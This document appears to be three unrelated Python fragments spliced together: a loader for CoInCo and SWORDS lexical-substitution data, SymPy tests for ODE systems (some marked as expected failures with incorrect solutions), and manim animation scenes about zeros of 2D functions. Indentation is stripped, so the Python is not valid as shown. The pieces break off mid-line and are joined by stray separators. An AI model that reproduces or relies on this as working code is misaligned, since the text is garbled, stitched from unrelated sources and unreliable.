if include_surrounding_context:
context_str = masc_txt[context_bounds[0]:context_bounds[1]]
region_offset_in_context = region_bounds[0] - context_bounds[0]
else:
context_str = region
region_offset_in_context = 0
else:
region = normalize_text(context_el.find('targetsentence').text)
if include_surrounding_context:
s_pre = normalize_text(context_el.find('precontext').text)
s_post = normalize_text(context_el.find('postcontext').text)
s = []
if len(s_pre) > 0:
s.append(s_pre)
s_raw_i = len(s)
s.append(region)
if len(s_post) > 0:
s.append(s_post)
context_str = ' '.join(s)
region_offset_in_context = tokens_offsets(context_str, s)[s_raw_i]
else:
context_str = region
region_offset_in_context = 0
assert region_offset_in_context >= 0
# Tokenize
region_tokens_els = context_el.find_all('token')
region_tokens = [t.attrs['wordform'].strip() for t in region_tokens_els]
region_tokens_offsets = tokens_offsets(region, region_tokens)
# NOTE: CoInCo sometimes has an extra token at the end which we can safely ignore
assert None not in region_tokens_offsets[:-1]
# Add context
cid = LexSubDataset.context_id(LexSubDataset.create_context(context_str))
extra = {
'legacy_id': f'{masc_fn}:{masc_region_id}',
'split': unofficial_split,
'masc': {
'document_fn': masc_fn,
'region_id': masc_region_id,
'region_bounds': region_bounds,
'context_bounds': context_bounds,
},
'coinco': {
'split': coinco_split,
'xml_index': context_index,
'xml_attrs': context_el.attrs,
'precontext': context_el.find('precontext').text.strip(),
'targetsentence': context_el.find('targetsentence').text.strip(),
'postcontext': context_el.find('postcontext').text.strip(),
}
}
if d.has_context(cid):
extra = d.get_context(cid)['extra'] + [extra]
else:
extra = [extra]
cid = d.add_context(context_str, extra=extra, update_ok=True)
for target_index, (target_el, target_offset) in enumerate(zip(region_tokens_els, region_tokens_offsets)):
substitute_els = target_el.find_all('subst')
# Skip if target token not in context (due to handful of tokenization errors in CoInCo)
if target_offset is None:
assert len(substitute_els) == 0
continue
# Skip if target not POS-tagged in MASC
target_pos_masc = target_el.attrs['posMASC'].strip()
if target_pos_masc == 'XXX':
assert len(substitute_els) == 0
continue
else:
# TODO: Is this problematic? I.e., posMASC='XXX' implies no labels collected
assert len(substitute_els) > 0
target_pos = PTB_POS_TO_POS[target_pos_masc]
# Skip if problematic
if skip_problematic and target_el.attrs['problematic'].strip().lower() == 'yes':
continue
# Check split just to be safe
coinco_id = int(target_el.attrs['id'])
if coinco_split == 'dev':
assert coinco_id in _COINCO_DEV_IDS
else:
assert coinco_id in _COINCO_TEST_IDS
# Add target
target_str = target_el.attrs['wordform'].strip()
context_offset = region_offset_in_context + target_offset
if repair_context:
document_offset = region_bounds[0] + target_offset
assert masc_txt[document_offset:document_offset+len(target_str)].lower() == target_str.lower()
else:
document_offset = None
tid = LexSubDataset.target_id(LexSubDataset.create_target(cid, target_str, context_offset, pos=target_pos))
extra = {
'legacy_id': target_el.attrs['id'],
'masc': {
'document_offset': document_offset,
},
'coinco': {
'xml_index': target_index,
'xml_attrs': target_el.attrs
}
}
if d.has_target(tid):
extra = d.get_target(tid)['extra'] + [extra]
else:
extra = [extra]
tid = d.add_target(cid, target_str, context_offset, pos=target_pos, extra=extra, update_ok=True)
for substitute_index, substitute_el in enumerate(substitute_els):
# Add substitute
substitute_str = substitute_el.attrs['lemma'].strip()
num_votes = int(substitute_el.attrs['freq'])
sid = LexSubDataset.substitute_id(LexSubDataset.create_substitute(tid, substitute_str))
extra = {
'legacy_id': substitute_index,
'coinco': {
'xml_index': substitute_index,
'xml_attrs': substitute_el.attrs
}
}
if d.has_substitute(sid):
labels = d.get_substitute_labels(sid)
assert all([l == Label.TRUE_IMPLICIT for l in labels])
num_votes += len(labels)
extra = d.get_substitute(sid)['extra'] + [extra]
else:
extra = [extra]
labels = [Label.TRUE_IMPLICIT] * num_votes
sid = d.add_substitute(tid, substitute_str, labels, extra=extra, update_ok=True)
if include_negatives:
tid_to_sids = defaultdict(list)
for sid in d.all_substitute_ids():
tid_to_sids[d.get_substitute(sid)['target_id']].append(sid)
for tid in d.all_target_ids():
target = d.get_target(tid)
coinco_id = int(target['extra'][-1]['coinco']['xml_attrs']['id'])
candidates = _COINCO_ID_TO_MELAMUD_CANDIDATES.get(coinco_id, [])
substitutes = set([d.get_substitute(sid)['substitute'].lower() for sid in tid_to_sids.get(tid, [])])
for c in candidates:
if c.lower() not in substitutes:
sid = LexSubDataset.substitute_id(LexSubDataset.create_substitute(tid, c))
if d.has_substitute(sid):
labels = d.get_substitute_labels(sid)
assert all([l == Label.FALSE_IMPLICIT for l in labels])
else:
d.add_substitute(tid, c, [Label.FALSE_IMPLICIT], extra={'source': 'melamud'})
return d
def swords(
split='test',
amt_csv_assets=[],
deny_list_assets=[],
strict_num_labels=None,
ensure_unique_substitute_labelers=False,
skip_control=True):
if split not in ['dev', 'test', 'train', 'valid']:
raise ValueError()
if ensure_unique_substitute_labelers:
# TODO
raise NotImplementedError()
assert len(amt_csv_assets) == len(set(amt_csv_assets))
assert len(deny_list_assets) == len(set(deny_list_assets))
# Create deny lists
worker_deny_list = set()
row_deny_list = set()
substitute_deny_list = set()
for deny_list_tag in deny_list_assets:
if type(deny_list_tag) == tuple:
text = file_from_bundle(ASSETS[deny_list_tag[0]]['fp'], deny_list_tag[1]).decode('utf-8')
lines = text.strip().splitlines()
else:
with open(ASSETS[deny_list_tag]['fp'], 'r') as f:
lines = f.read().strip().splitlines()
for l in lines:
ids = l.split()
assert len(ids) in [1, 2, 3]
worker_id = ids[0]
assert worker_id.startswith('A')
if len(ids) == 1:
worker_deny_list.add(worker_id)
else:
hit_id = ids[1]
assert len(hit_id) == 30
if len(ids) == 2:
row_deny_list.add((worker_id, hit_id))
else:
substitute_deny_list.add((worker_id, hit_id, int(ids[2])))
# Create dataset
coinco_d = coinco(split=split, repair_context=True)
# Parse AMT CSVs
d = LexSubDataset(substitutes_lemmatized=True)
row_ids_encountered = set()
num_labeled = 0
num_unlabeled = 0
for csv_tag in amt_csv_assets:
if type(csv_tag) == tuple:
text = file_from_bundle(ASSETS[csv_tag[0]]['fp'], csv_tag[1]).decode('utf-8')
reader = csv.DictReader(StringIO(text))
else:
with open(ASSETS[csv_tag]['fp'], 'r') as f:
reader = csv.DictReader(f)
for row in reader:
# Skip row if needed
worker_id = row['WorkerId'].strip()
row_id = (worker_id, row['HITId'].strip())
assert row_id not in row_ids_encountered
row_ids_encountered.add(row_id)
if worker_id in worker_deny_list:
continue
if row_id in row_deny_list:
continue
# Filter out buggy contects from first CSV tag
if '1109_0_300_results.csv' in csv_tag[-1] and (row['Input.s_left'] + row['Input.w'] + row['Input.s_right']) != row['Input.s']:
continue
# Extract target-level info
cid = row['Input.id']
if not coinco_d.has_context(cid):
continue
assert coinco_d.has_context(cid)
tid = row['Input.target_id']
assert coinco_d.has_target(tid)
assert row['Input.w'] == coinco_d.get_target(tid)['target']
#feedback = row['Answer.feedback']
# Extract substitute-level info
i = -1
while f'Input.wprime_id_{i+1}' in row:
i += 1
# Skip substitute if specified
substitute_id = row_id + (i,)
if substitute_id in substitute_deny_list:
continue
# Get substitute
maybe_sid = row[f'Input.wprime_id_{i}']
substitute_str = row[f'Input.wprime_{i}']
assert substitute_str.strip() == substitute_str
if len(substitute_str) == 0:
continue
sid = LexSubDataset.substitute_id(LexSubDataset.create_substitute(tid, substitute_str))
if sid != maybe_sid:
assert len(maybe_sid) != 42
source = row[f'Input.source_{i}'].strip()
if skip_control and source in ['same', 'rand']:
continue
# TODO: Restore time zone to PST
assert ' PST' in row['CreationTime']
hit_creation_time = int(datetime.strptime(row['CreationTime'].replace(' PST', ''), '%a %b %d %H:%M:%S %Y').timestamp())
# Get label
labels = [row[f'Answer.candidate{i}-{l}.on'] for l in ['abstain', 'bad', 'good']]
assert all([l in ['false', 'true'] for l in labels])
num_true = labels.count('true')
if num_true == 0:
num_unlabeled += 1
continue
elif num_true > 1:
raise Exception()
label = [Label.UNSURE, Label.FALSE, Label.TRUE][labels.index('true')]
num_labeled += 1
# Add context to dataset
if not d.has_context(cid):
context = coinco_d.get_context(cid)
_cid = d.add_context(context['context'], extra=context.get('extra'))
assert _cid == cid
# Add target to dataset
if not d.has_target(tid):
target = coinco_d.get_target(tid)
_tid = d.add_target(cid, target['target'], target['offset'], pos=target['pos'], extra=target.get('extra'))
assert _tid == tid
# Add substitute to dataset
extra = {
'substitute_source': source,
'label_source': substitute_id,
'hit_creation_time': hit_creation_time,
}
if coinco_d.has_substitute(sid):
extra['coinco'] = coinco_d.get_substitute(sid)['extra']
extra['coinco_labels'] = [l.name for l in coinco_d.get_substitute_labels(sid)]
if d.has_substitute(sid):
# Update substitute
labels = d.get_substitute_labels(sid) + [label]
extra = d.get_substitute(sid)['extra'] + [extra]
else:
# Create substitute
labels = [label]
extra = [extra]
assert len(extra) == len(labels)
_sid = d.add_substitute(tid, substitute_str, labels, extra=extra, update_ok=True)
assert _sid == sid
# Warn
if num_unlabeled > 0:
warnings.warn(f'{num_unlabeled} / {num_unlabeled + num_labeled} substitutes were unlabeled')
# Filter substitutes down to N labels
if strict_num_labels is not None:
d_strict = LexSubDataset(substitutes_lemmatized=True)
for sid in d.all_substitute_ids():
substitute = d.get_substitute(sid)
labels = d.get_substitute_labels(sid)
# Skip if we have less than N
if len(labels) < strict_num_labels:
continue
# Grab the most recent N labels if we have more than N
extra = substitute['extra']
if len(labels) > strict_num_labels:
assert len(labels) == len(extra)
labels_and_extra = list(zip(labels, extra))
labels_and_extra = sorted(labels_and_extra, | |
for ds in dsolve_sol] == [f(x), g(x)]
assert [ds.rhs.equals(ss.rhs) for ds, ss in zip(dsolve_sol, sol)]
assert checksysodesol(eqs, sol) == (True, [0, 0]) # XFAIL
@XFAIL
def test_linear_2eq_order1_type6_path2():
# This is the reverse of the equations above and should also be handled by
# type6.
eqs = [
Eq(diff(g(x), x), 2 * (1 + 2 / x) * g(x) + 2 * (x - 1 / x) * f(x)),
Eq(diff(f(x), x), g(x) + x * f(x)),
]
# This solution is currently returned but is incorrect:
sol = [
Eq(
g(x),
C1 * exp(-2 * Integral(1 / x, x))
+ 2
* (
C1
+ Integral(
-C2 * exp(-2 * Integral(1 / x, x)) * exp(Integral(-2 * x - 1, x)), x
)
)
* exp(-Integral(-2 * x - 1, x)),
),
Eq(
f(x),
(
C1
+ Integral(
-C2 * exp(-2 * Integral(1 / x, x)) * exp(Integral(-2 * x - 1, x)), x
)
)
* exp(-Integral(-2 * x - 1, x)),
),
]
dsolve_sol = dsolve(eqs)
# Comparing solutions with == doesn't work in this case...
assert [ds.lhs for ds in dsolve_sol] == [g(x), f(x)]
assert [ds.rhs.equals(ss.rhs) for ds, ss in zip(dsolve_sol, sol)]
assert checksysodesol(eqs, sol) == (True, [0, 0]) # XFAIL
def test_nth_euler_imroot():
eq = x ** 2 * f(x).diff(x, 2) + x * f(x).diff(x) + 4 * f(x) - 1 / x
sol = Eq(f(x), C1 * sin(2 * log(x)) + C2 * cos(2 * log(x)) + 1 / (5 * x))
dsolve_sol = dsolve(
eq, hint="nth_linear_euler_eq_nonhomogeneous_variation_of_parameters"
)
assert dsolve_sol == sol
assert checkodesol(eq, sol, order=2, solve_for_func=False)[0]
def test_constant_coeff_circular_atan2():
eq = f(x).diff(x, x) + y * f(x)
sol = Eq(f(x), C1 * exp(-x * sqrt(-y)) + C2 * exp(x * sqrt(-y)))
assert dsolve(eq) == sol
assert checkodesol(eq, sol, order=2, solve_for_func=False)[0]
@XFAIL
def test_linear_2eq_order2_type1_fail1():
eqs = [Eq(f(x).diff(x, 2), 2 * f(x) + g(x)), Eq(g(x).diff(x, 2), -f(x))]
# This is the returned solution but it isn't correct:
sol = [
Eq(
f(x),
2 * C1 * (x + 2) * exp(x)
+ 2 * C2 * (x + 2) * exp(-x)
+ 2 * C3 * x * exp(x)
+ 2 * C4 * x * exp(-x),
),
Eq(
g(x),
-2 * C1 * x * exp(x)
- 2 * C2 * x * exp(-x)
+ C3 * (-2 * x + 4) * exp(x)
+ C4 * (-2 * x - 4) * exp(-x),
),
]
assert dsolve(eqs) == sol
assert checksysodesol(eqs, sol) == (True, [0, 0])
@XFAIL
def test_linear_2eq_order2_type1_fail2():
eqs = [Eq(f(x).diff(x, 2), 0), Eq(g(x).diff(x, 2), f(x))]
sol = [
Eq(f(x), C1 + C2 * x),
Eq(g(x), C4 + C3 * x + C2 * x ** 3 / 6 + C1 * x ** 2 / 2),
]
assert dsolve(eqs) == sol # UnboundLocalError
assert checksysodesol(eqs, sol) == (True, [0, 0])
def test_linear_2eq_order2_type1():
eqs = [Eq(f(x).diff(x, 2), 2 * f(x)), Eq(g(x).diff(x, 2), -f(x) + 2 * g(x))]
sol = [
Eq(
f(x),
2 * sqrt(2) * C1 * exp(sqrt(2) * x) + 2 * sqrt(2) * C2 * exp(-sqrt(2) * x),
),
Eq(
g(x),
-C1 * x * exp(sqrt(2) * x)
+ C2 * x * exp(-sqrt(2) * x)
+ C3 * exp(sqrt(2) * x)
+ C4 * exp(-sqrt(2) * x),
),
]
assert dsolve(eqs) == sol
assert checksysodesol(eqs, sol) == (True, [0, 0])
eqs = [Eq(f(x).diff(x, 2), 2 * f(x) + g(x)), Eq(g(x).diff(x, 2), +2 * g(x))]
sol = [
Eq(
f(x),
C1 * x * exp(sqrt(2) * x)
- C2 * x * exp(-sqrt(2) * x)
+ C3 * exp(sqrt(2) * x)
+ C4 * exp(-sqrt(2) * x),
),
Eq(
g(x),
2 * sqrt(2) * C1 * exp(sqrt(2) * x) + 2 * sqrt(2) * C2 * exp(-sqrt(2) * x),
),
]
assert dsolve(eqs) == sol
assert checksysodesol(eqs, sol) == (True, [0, 0])
eqs = [Eq(f(x).diff(x, 2), f(x)), Eq(g(x).diff(x, 2), f(x))]
sol = [
Eq(f(x), C1 * exp(x) + C2 * exp(-x)),
Eq(g(x), C1 * exp(x) + C2 * exp(-x) - C3 * x - C4),
]
assert dsolve(eqs) == sol
assert checksysodesol(eqs, sol) == (True, [0, 0])
eqs = [Eq(f(x).diff(x, 2), f(x) + g(x)), Eq(g(x).diff(x, 2), -f(x) - g(x))]
sol = [
Eq(f(x), C1 * x ** 3 + C2 * x ** 2 + C3 * x + C4),
Eq(g(x), -C1 * x ** 3 + 6 * C1 * x - C2 * x ** 2 + 2 * C2 - C3 * x - C4),
]
assert dsolve(eqs) == sol
assert checksysodesol(eqs, sol) == (True, [0, 0])
def test_linear_2eq_order2_type2():
eqs = [Eq(f(x).diff(x, 2), f(x) + g(x) + 1), Eq(g(x).diff(x, 2), f(x) + g(x) + 1)]
sol = [
Eq(f(x), C1 * exp(sqrt(2) * x) + C2 * exp(-sqrt(2) * x) + C3 * x + C4 - S.Half),
Eq(g(x), C1 * exp(sqrt(2) * x) + C2 * exp(-sqrt(2) * x) - C3 * x - C4 - S.Half),
]
assert dsolve(eqs) == sol
assert checksysodesol(eqs, sol) == (True, [0, 0])
eqs = [Eq(f(x).diff(x, 2), f(x) + g(x) + 1), Eq(g(x).diff(x, 2), -f(x) - g(x) + 1)]
sol = [
Eq(f(x), C1 * x ** 3 + C2 * x ** 2 + C3 * x + C4 + x ** 4 / 12 + x ** 2 / 2),
Eq(
g(x),
-C1 * x ** 3
+ 6 * C1 * x
- C2 * x ** 2
+ 2 * C2
- C3 * x
- C4
- x ** 4 / 12
+ x ** 2 / 2,
),
]
assert dsolve(eqs) == sol
assert checksysodesol(eqs, sol) == (True, [0, 0])
@XFAIL
def test_linear_2eq_order2_type4():
Ca, Cb, Ra, Rb = symbols("Ca, Cb, Ra, Rb")
eq = [
f(x).diff(x, 2) + 2 * f(x).diff(x) + f(x) + g(x) - 2 * exp(I * x),
g(x).diff(x, 2) + 2 * g(x).diff(x) + f(x) + g(x) - 2 * exp(I * x),
]
dsolve_sol = dsolve(eq)
# Solution returned with Ca, Ra etc symbols is clearly incorrect:
sol = [
Eq(
f(x),
C1
+ C2 * exp(2 * x)
+ C3 * exp(x * (1 + sqrt(3)))
+ C4 * exp(x * (-sqrt(3) + 1))
+ (I * Ca + Ra) * exp(I * x),
),
Eq(
g(x),
-C1
- 3 * C2 * exp(2 * x)
+ C3 * (-3 * sqrt(3) - 4 + (1 + sqrt(3)) ** 2) * exp(x * (1 + sqrt(3)))
+ C4 * (-4 + (-sqrt(3) + 1) ** 2 + 3 * sqrt(3)) * exp(x * (-sqrt(3) + 1))
+ (I * Cb + Rb) * exp(I * x),
),
]
assert dsolve_sol == sol
assert checksysodesol(eq, sol) == (True, [0, 0]) # Fails here
def test_linear_2eq_order2_type5():
eqs = [
Eq(f(x).diff(x, 2), 2 * (x * g(x).diff(x) - g(x))),
Eq(g(x).diff(x, 2), -2 * (x * f(x).diff(x) - f(x))),
]
sol = [
Eq(
f(x),
C3 * x
+ x * Integral((2 * C1 * cos(x ** 2) + 2 * C2 * sin(x ** 2)) / x ** 2, x),
),
Eq(
g(x),
C4 * x
+ x * Integral((-2 * C1 * sin(x ** 2) + 2 * C2 * cos(x ** 2)) / x ** 2, x),
),
]
assert dsolve(eqs) == sol
# FIXME: checksysodesol not working:
# assert checksysodesol(eqs, sol) == (True, [0, 0])
def test_linear_2eq_order2_type8():
eqs = [
Eq(f(x).diff(x, 2), 2 / x * (x * g(x).diff(x) - g(x))),
Eq(g(x).diff(x, 2), -2 / x * (x * f(x).diff(x) - f(x))),
]
# FIXME: This is what is returned but it does not seem correct:
sol = [
Eq(
f(x),
C3 * x
+ x
* Integral(
(-C1 * cos(Integral(-2, x)) - C2 * sin(Integral(-2, x))) / x ** 2, x
),
),
Eq(
g(x),
C4 * x
+ x
* Integral(
(-C1 * sin(Integral(-2, x)) + C2 * cos(Integral(-2, x))) / x ** | |
full_rect.set_stroke(WHITE, 0)
full_rect.color_using_background_image(self.background_image_file)
title = TextMobject("Output Space")
title.scale(1.5)
title.to_edge(UP, buff = MED_SMALL_BUFF)
title.set_stroke(BLACK, 1)
# self.add_foreground_mobjects(title)
plane = NumberPlane()
plane.fade(0.5)
plane.axes.set_stroke(WHITE, 3)
# plane.add(BackgroundRectangle(title))
self.add(plane)
dots = VGroup()
step = self.dot_spacing
for x in np.arange(-FRAME_X_RADIUS, FRAME_X_RADIUS+step, step):
for y in np.arange(-FRAME_Y_RADIUS, FRAME_Y_RADIUS+step, step):
dot = Dot(color = WHITE)
dot.color_using_background_image(self.background_image_file)
dot.move_to(x*RIGHT + y*UP)
dots.add(dot)
random.shuffle(dots.submobjects)
m = 3 #exponential factor
n = 1
dot_groups = VGroup()
while n <= len(dots):
dot_groups.add(dots[n-1:m*n-1])
n *= m
self.play(LaggedStart(
LaggedStart, dot_groups,
lambda dg : (GrowFromCenter, dg),
run_time = 8,
lag_ratio = 0.2,
))
class DotsHoppingToColor(InputOutputScene):
CONFIG = {
"dot_radius" : 0.05,
"dot_density" : 0.25,
}
def construct(self):
input_coloring, output_coloring = self.get_colorings()
input_plane, output_plane = self.get_planes()
v_line = self.get_v_line()
dots = self.get_dots(input_plane, output_plane)
right_half_block = Rectangle(
height = FRAME_HEIGHT,
width = FRAME_X_RADIUS - SMALL_BUFF,
stroke_width = 0,
fill_color = BLACK,
fill_opacity = 0.8,
)
right_half_block.to_edge(RIGHT, buff = 0)
#Introduce parts
self.add(input_plane, output_plane, v_line)
self.play(
FadeIn(output_coloring),
Animation(output_plane),
output_plane.white_parts.set_color, BLACK,
output_plane.lines_to_fade.set_stroke, {"width" : 0},
)
self.wait()
self.play(LaggedStart(GrowFromCenter, dots, run_time = 3))
self.wait()
#Hop over and back
self.play(LaggedStart(
MoveToTarget, dots,
path_arc = -TAU/4,
run_time = 3,
))
self.wait()
self.play(LaggedStart(
ApplyMethod, dots,
lambda d : (d.set_fill, d.target_color),
))
self.wait()
self.play(LaggedStart(
ApplyMethod, dots,
lambda d : (d.move_to, d.original_position),
path_arc = TAU/4,
run_time = 3,
))
self.wait()
self.play(
FadeIn(input_coloring),
Animation(input_plane),
input_plane.white_parts.set_color, BLACK,
input_plane.lines_to_fade.set_stroke, {"width" : 0},
FadeOut(dots),
)
self.wait()
#Cover output half
right_half_block.save_state()
right_half_block.next_to(FRAME_X_RADIUS*RIGHT, RIGHT)
self.play(right_half_block.restore)
self.wait()
# Show yellow points
inspector = DashedLine(
ORIGIN, TAU*UP,
dashed_segment_length = TAU/24,
fill_opacity = 0,
stroke_width = 3,
stroke_color = WHITE,
)
inspector.add(*inspector.copy().set_color(BLACK).shift((TAU/24)*UP))
inspector.apply_complex_function(np.exp)
inspector.scale(0.15)
inspector_image = inspector.copy()
def update_inspector_image(inspector_image):
inspector_image.move_to(self.point_function(inspector.get_center()))
inspector_image_update_anim = UpdateFromFunc(
inspector_image, update_inspector_image
)
pink_points_label = TextMobject("Pink points")
pink_points_label.scale(0.7)
pink_points_label.set_color(BLACK)
self.play(
inspector.move_to, input_plane.coords_to_point(-2.75, 2.75),
inspector.set_stroke, {"width" : 2},
)
pink_points_label.next_to(inspector, RIGHT)
self.play(
Rotating(
inspector, about_point = inspector.get_center(),
rate_func = smooth,
run_time = 2,
),
Write(pink_points_label)
)
self.wait()
self.play(right_half_block.next_to, FRAME_X_RADIUS*RIGHT, RIGHT)
inspector_image_update_anim.update(0)
self.play(ReplacementTransform(
inspector.copy(), inspector_image,
path_arc = -TAU/4,
))
self.play(
ApplyMethod(
inspector.move_to,
input_plane.coords_to_point(-2, 0),
path_arc = -TAU/8,
run_time = 3,
),
inspector_image_update_anim
)
self.play(
ApplyMethod(
inspector.move_to,
input_plane.coords_to_point(-2.75, 2.75),
path_arc = TAU/8,
run_time = 3,
),
inspector_image_update_anim
)
self.play(FadeOut(pink_points_label))
# Show black zero
zeros = tuple(it.starmap(input_plane.coords_to_point, [
(-2., -1), (1, 1), (2, -2),
]))
for x in range(2):
for zero in zeros:
path = ParametricFunction(
bezier([
inspector.get_center(),
input_plane.coords_to_point(0, 0),
zero
]),
t_min = 0, t_max = 1
)
self.play(
MoveAlongPath(inspector, path, run_time = 2),
inspector_image_update_anim,
)
self.wait()
self.play(FadeOut(VGroup(inspector, inspector_image)))
# Show all dots and slowly fade them out
for dot in dots:
dot.scale(1.5)
self.play(
FadeOut(input_coloring),
input_plane.white_parts.set_color, WHITE,
LaggedStart(GrowFromCenter, dots)
)
self.wait()
random.shuffle(dots.submobjects)
self.play(LaggedStart(
FadeOut, dots,
lag_ratio = 0.05,
run_time = 10,
))
# Ask about whether a region contains a zero
question = TextMobject("Does this region \\\\ contain a zero?")
question.add_background_rectangle(opacity = 1)
question.next_to(input_plane.label, DOWN)
square = Square()
square.match_background_image_file(input_coloring)
square.move_to(input_plane)
self.play(ShowCreation(square), Write(question))
self.wait()
quads = [
(0, 0.5, 6, 6.25),
(1, 1, 0.5, 2),
(-1, -1, 3, 4.5),
(0, 1.25, 5, 1.7),
(-2, -1, 1, 1),
]
for x, y, width, height in quads:
self.play(
square.stretch_to_fit_width, width,
square.stretch_to_fit_height, height,
square.move_to, input_plane.coords_to_point(x, y)
)
self.wait()
class SoWeFoundTheZeros(AltTeacherStudentsScene):
def construct(self):
self.student_says(
"Aha! So we \\\\ found the solutions!",
target_mode = "hooray",
student_index = 2,
bubble_kwargs = {"direction" : LEFT},
)
self.wait()
self.teacher_says(
"Er...only \\\\ kind of",
target_mode = "hesitant"
)
self.wait(3)
class Rearrange2DEquation(AltTeacherStudentsScene):
def construct(self):
f_tex, g_tex, h_tex = [
"%s(\\text{2d point})"%char
for char in ("f", "g", "h")
]
zero_tex = "\\vec{\\textbf{0}}"
equations = VGroup(
TexMobject(g_tex, "", "=", h_tex, ""),
TexMobject(g_tex, "-", h_tex, "=", zero_tex),
)
equations.move_to(self.hold_up_spot, DOWN)
equations.shift_onto_screen()
brace = Brace(equations[1], UP)
zero_eq = brace.get_tex("%s = %s"%(f_tex, zero_tex))
for equation in equations:
equation.set_color_by_tex(g_tex, BLUE)
equation.set_color_by_tex(h_tex, YELLOW)
equation.sort_submobjects_alphabetically()
self.teacher_holds_up(equations[0])
self.change_all_student_modes("pondering")
self.play(Transform(
*equations,
run_time = 1.5,
path_arc = TAU/2
))
self.play(
Succession(
GrowFromCenter(brace),
Write(zero_eq, run_time = 1)
),
self.get_student_changes(*["happy"]*3)
)
self.play(*[
ApplyMethod(pi.change, "thinking", self.screen)
for pi in self.pi_creatures
])
self.wait(3)
class SearchForZerosInInputSpace(ColorMappedObjectsScene):
CONFIG = {
"func" : example_plane_func,
}
def construct(self):
ColorMappedObjectsScene.construct(self)
title = TextMobject("Input space")
title.scale(2)
title.to_edge(UP)
title.set_stroke(BLACK, 1)
title.add_background_rectangle()
plane = NumberPlane()
plane.fade(0.5)
plane.axes.set_stroke(WHITE, 3)
self.add(plane, title)
looking_glass = Circle()
looking_glass.set_stroke(WHITE, 3)
looking_glass.set_fill(WHITE, 0.6)
looking_glass.color_using_background_image(self.background_image_file)
question = TextMobject("Which points go to 0?")
question.next_to(looking_glass, DOWN)
question.add_background_rectangle()
mover = VGroup(looking_glass, question)
mover.move_to(4*LEFT + UP)
self.play(FadeIn(mover))
points = [4*RIGHT+UP, 2*RIGHT+2*DOWN, 2*LEFT+2*DOWN, 3*RIGHT+2.5*DOWN]
for point in points:
self.play(mover.move_to, point, run_time = 1.5)
self.wait()
class OneDRegionBoundary(Scene):
CONFIG = {
"graph_color" : BLUE,
"region_rect_height" : 0.1,
}
def construct(self):
x0 = self.x0 = 3
x1 = self.x1 = 6
fx0 = self.fx0 = -2
fx1 = self.fx1 = 2
axes = self.axes = Axes(
x_min = -1, x_max = 10,
y_min = -3, y_max = 3,
)
axes.center()
axes.set_stroke(width = 2)
input_word = TextMobject("Input")
input_word.next_to(axes.x_axis, UP, SMALL_BUFF, RIGHT)
output_word = TextMobject("Output")
output_word.next_to(axes.y_axis, UP)
axes.add(input_word, output_word)
self.add(axes)
graph = self.get_graph_part(1, 1)
alt_graphs = [
self.get_graph_part(*points)
for points in [
(-1, -2),
(-1, -1, -1),
(1, 1, 1),
(-0.75, 0, 1.75),
(-3, -2, -1),
]
]
#Region and boundary
line = Line(axes.coords_to_point(x0, 0), axes.coords_to_point(x1, 0))
region = Rectangle(
stroke_width = 0,
fill_color = YELLOW,
fill_opacity = 0.5,
height = self.region_rect_height
)
region.match_width(line, stretch = True)
region.move_to(line)
region_words = TextMobject("Input region")
region_words.set_width(0.8*region.get_width())
region_words.next_to(region, UP)
x0_arrow, x1_arrow = arrows = VGroup(*[
Arrow(
axes.coords_to_point(x, 0),
axes.coords_to_point(x, fx),
color = color,
buff = 0
)
for x, fx, color in [(x0, fx0, RED), (x1, fx1, GREEN)]
])
minus = TexMobject("-")
minus.match_color(x0_arrow)
minus.next_to(x0_arrow, UP)
plus = TexMobject("+")
plus.match_color(x1_arrow)
plus.next_to(x1_arrow, DOWN)
signs = VGroup(plus, minus)
self.play(
GrowFromCenter(region),
FadeIn(region_words)
)
self.wait()
self.play(*it.chain(
list(map(GrowArrow, arrows)),
list(map(Write, signs))
))
self.wait()
self.play(
ShowCreation(graph),
FadeOut(region_words),
)
self.wait()
for alt_graph in alt_graphs + alt_graphs:
self.play(Transform(graph, alt_graph, path_arc = 0.1*TAU))
self.wait()
###
def get_graph_part(self, *interim_values):
result = VMobject()
result.set_stroke(self.graph_color, 3)
result.set_fill(opacity = 0)
values = [self.fx0] + list(interim_values) + [self.fx1]
result.set_points_smoothly([
self.axes.coords_to_point(x, fx)
for x, fx in zip(
np.linspace(self.x0, self.x1, len(values)),
values
)
])
return result
class DirectionOfA2DFunctionAlongABoundary(InputOutputScene):
def construct(self):
colorings = self.get_colorings()
colorings.set_fill(opacity = 0.25)
input_plane, output_plane = planes = self.get_planes()
for plane in planes:
plane.lines_to_fade.set_stroke(width = 0)
v_line = self.get_v_line()
rect = Rectangle()
rect.set_stroke(WHITE, 5)
rect.set_fill(WHITE, 0)
line = Line(
input_plane.coords_to_point(-0.75, 2.5),
input_plane.coords_to_point(2.5, -1.5),
)
rect.replace(line, stretch = True)
rect.insert_n_anchor_points(50)
rect.match_background_image_file(colorings[0])
rect_image = rect.copy()
rect_image.match_background_image_file(colorings[1])
def update_rect_image(rect_image):
rect_image.points = np.array(rect.points)
rect_image.apply_function(self.point_function)
rect_image_update_anim = UpdateFromFunc(rect_image, update_rect_image)
def get_input_point():
return rect.points[-1]
def get_output_coords():
in_coords = input_plane.point_to_coords(get_input_point())
return self.func(in_coords)
def get_angle():
return angle_of_vector(get_output_coords())
def get_color():
return rev_to_color(get_angle()/TAU) #Negative?
out_vect = Vector(RIGHT, color = WHITE)
out_vect_update_anim = UpdateFromFunc(
out_vect,
lambda ov : ov.put_start_and_end_on(
output_plane.coords_to_point(0, 0),
rect_image.points[-1]
).set_color(get_color())
)
dot = Dot()
dot.set_stroke(BLACK, 1)
dot_update_anim = UpdateFromFunc(
dot, lambda d : d.move_to(get_input_point()).set_fill(get_color())
)
in_vect = Vector(RIGHT)
def update_in_vect(in_vect):
in_vect.put_start_and_end_on(ORIGIN, 0.5*RIGHT)
in_vect.rotate(get_angle())
in_vect.set_color(get_color())
in_vect.shift(get_input_point() - in_vect.get_start())
return in_vect
in_vect_update_anim = UpdateFromFunc(in_vect, update_in_vect)
self.add(colorings, planes, v_line)
self.play(
GrowArrow(out_vect),
GrowArrow(in_vect),
Animation(dot),
)
self.play(
ShowCreation(rect),
ShowCreation(rect_image),
out_vect_update_anim,
in_vect_update_anim,
dot_update_anim,
rate_func = bezier([0, 0, 1, 1]),
run_time = 10,
)
class AskAboutHowToGeneralizeSigns(AltTeacherStudentsScene):
def construct(self):
# 2d plane
plane = NumberPlane(x_radius = 2.5, y_radius = 2.5)
plane.scale(0.8)
plane.to_corner(UP+LEFT)
plane.add_coordinates()
dot = Dot(color = YELLOW)
label = TextMobject("Sign?")
label.add_background_rectangle()
label.scale(0.5)
label.next_to(dot, UP, SMALL_BUFF)
dot.add(label)
